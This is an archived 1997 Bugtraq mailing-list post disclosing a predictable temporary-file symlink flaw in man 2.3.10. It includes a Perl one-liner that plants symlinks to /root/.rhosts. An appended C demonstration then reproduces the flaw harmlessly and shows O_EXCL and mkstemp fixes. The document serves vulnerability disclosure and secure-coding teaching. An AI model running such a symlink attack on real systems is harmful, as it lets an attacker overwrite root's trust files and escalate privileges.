man problem

From: Thomas Fischbacher (tfat_private-MUENCHEN.DE)
Date: Wed Dec 24 1997 - 04:25:14 PST


    Since this is my first posting to bugtraq, please don't flame me if
    this is already known:
    
    I just noticed a problem with the man system (version 2.3.10) on my Linux
    box: /usr/man contains the .gz'd man pages:
    
    (from /usr/man/man1:)
    
    -rw-r--r--   1 root     root         1684 Sep 28  1995 cp.1.gz
    -rw-r--r--   1 root     root         4063 Dec 29  1995 cpio.1.gz
    -rw-r--r--   1 root     root           42 Oct 17  1996 cpp.1.gz
    
    When I execute man, a temporary file containing the un-zipped manpage is
    created in /tmp. The name of the tmp-file usually is "zman<PID>aaa",
    e.g. "zman10849aaa". This can be exploited with a simple symlink attack:
    
    perl -e 'for($i=8000;$i<12000;$i++){`ln -s /root/.rhosts /tmp/zman${i}aaa`;}'
    
    So when root executes man here and the pid of the man process falls in the
    range 8000-11999... you know the rest.
    
    --
         regards,                                               (o_
          Thomas Fischbacher -  tfat_private-muenchen.de        //\
                                                                V_/_
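The post stops at "you know the rest". The following is an added example, not code from the original post and not taken from the man 2.3.10 sources, that reproduces both halves of the problem unprivileged in C: a program that writes its scratch copy to the predictable name zman<PID>aaa with fopen(..., "w") follows a symlink planted there beforehand and overwrites whatever the link points to, whereas open() with O_CREAT|O_EXCL refuses a path that is already a symlink (POSIX mandates EEXIST even for a dangling link), and mkstemp() removes the predictable name altogether. The private directory under /tmp, the file named rhosts standing in for /root/.rhosts, and the sample page text are all constructed for the demonstration.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Constructed sample "decompressed man page" the privileged program writes out. */
static const char PAGE_TEXT[] = "CP(1)  User Commands  CP(1)\n";
static const char VICTIM_TEXT[] = "original\n";

/* Everything lives in a private mkdtemp() directory so the demo runs as an
 * ordinary user; "rhosts" is a hypothetical stand-in for /root/.rhosts. */
struct demo_env { char dir[PATH_MAX], victim[PATH_MAX], link[PATH_MAX]; };

static int env_create(struct demo_env *e) {
    FILE *f;
    strcpy(e->dir, "/tmp/zmandemo.XXXXXX");
    if (mkdtemp(e->dir) == NULL) return -1;
    snprintf(e->victim, sizeof e->victim, "%s/rhosts", e->dir);
    if ((f = fopen(e->victim, "w")) == NULL) return -1;
    fputs(VICTIM_TEXT, f);
    fclose(f);
    /* The attacker's move from the post: plant zman<PID>aaa as a symlink to the victim. */
    snprintf(e->link, sizeof e->link, "%s/zman%daaa", e->dir, (int)getpid());
    return symlink(e->victim, e->link);
}

static void env_destroy(struct demo_env *e) {
    unlink(e->link); unlink(e->victim); rmdir(e->dir);
}

static int read_file(const char *path, char *buf, size_t len) {
    FILE *f = fopen(path, "r");
    size_t n;
    if (!f) return -1;
    n = fread(buf, 1, len - 1, f);
    fclose(f);
    buf[n] = '\0';
    return (int)n;
}

/* Vulnerable pattern: predictable name, "w" mode (O_CREAT|O_TRUNC, no O_EXCL).
 * fopen() follows whatever already sits at the path, so a planted symlink
 * redirects the truncate-and-write to the victim file. */
int vulnerable_tmp_write(const char *path, const char *text) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(text, f);
    return fclose(f);
}

/* Fix 1: O_CREAT|O_EXCL. POSIX requires this to fail with EEXIST when the path
 * names a symlink, dangling or not, so a planted link is never followed. */
int hardened_tmp_open(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Fix 2: let mkstemp() pick an unpredictable name and create it atomically
 * (O_CREAT|O_EXCL internally); then verify the fd really is a plain file. */
int hardened_tmp_create(const char *dir, char *path_out, size_t len) {
    struct stat st;
    int fd;
    snprintf(path_out, len, "%s/zmanXXXXXX", dir);
    fd = mkstemp(path_out);
    if (fd < 0) return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd); unlink(path_out); return -1;
    }
    return fd;
}

/* Returns 1 if the victim's contents were replaced through the symlink. */
int demo_symlink_attack_succeeds(void) {
    struct demo_env e; char buf[128]; int hit;
    if (env_create(&e) != 0) return -1;
    vulnerable_tmp_write(e.link, PAGE_TEXT);
    hit = read_file(e.victim, buf, sizeof buf) > 0 && strcmp(buf, PAGE_TEXT) == 0;
    env_destroy(&e);
    return hit;
}

/* Returns 1 if O_EXCL refused the planted link and the victim is untouched. */
int demo_excl_blocks_attack(void) {
    struct demo_env e; char buf[128]; int fd, refused, intact;
    if (env_create(&e) != 0) return -1;
    fd = hardened_tmp_open(e.link);
    refused = (fd < 0 && errno == EEXIST);
    if (fd >= 0) close(fd);
    intact = read_file(e.victim, buf, sizeof buf) > 0 && strcmp(buf, VICTIM_TEXT) == 0;
    env_destroy(&e);
    return refused && intact;
}

/* Returns 1 if mkstemp() produced a regular file (not a link) with no group/other access. */
int demo_mkstemp_is_regular(void) {
    struct demo_env e; char path[PATH_MAX]; struct stat st; int fd, ok;
    if (env_create(&e) != 0) return -1;
    fd = hardened_tmp_create(e.dir, path, sizeof path);
    ok = fd >= 0 && lstat(path, &st) == 0 && S_ISREG(st.st_mode) && (st.st_mode & 077) == 0;
    if (fd >= 0) { close(fd); unlink(path); }
    env_destroy(&e);
    return ok;
}

int main(void) {
    printf("predictable name clobbered through symlink: %d\n", demo_symlink_attack_succeeds());
    printf("O_EXCL refuses planted symlink:             %d\n", demo_excl_blocks_attack());
    printf("mkstemp yields private regular file:        %d\n", demo_mkstemp_is_regular());
    return 0;
}
```

The first demo is the bug from the post in miniature: the only thing the attacker needed was a guessable name and a writer that does not insist on creating the file itself. The O_EXCL variant shows the minimal fix for a program that must keep its naming scheme; mkstemp() is the form to use in new code, and on a sticky-bit /tmp with protected_symlinks enabled the planted link would additionally be refused by the kernel, but a setuid or root program should not rely on that.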
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:37:26 PDT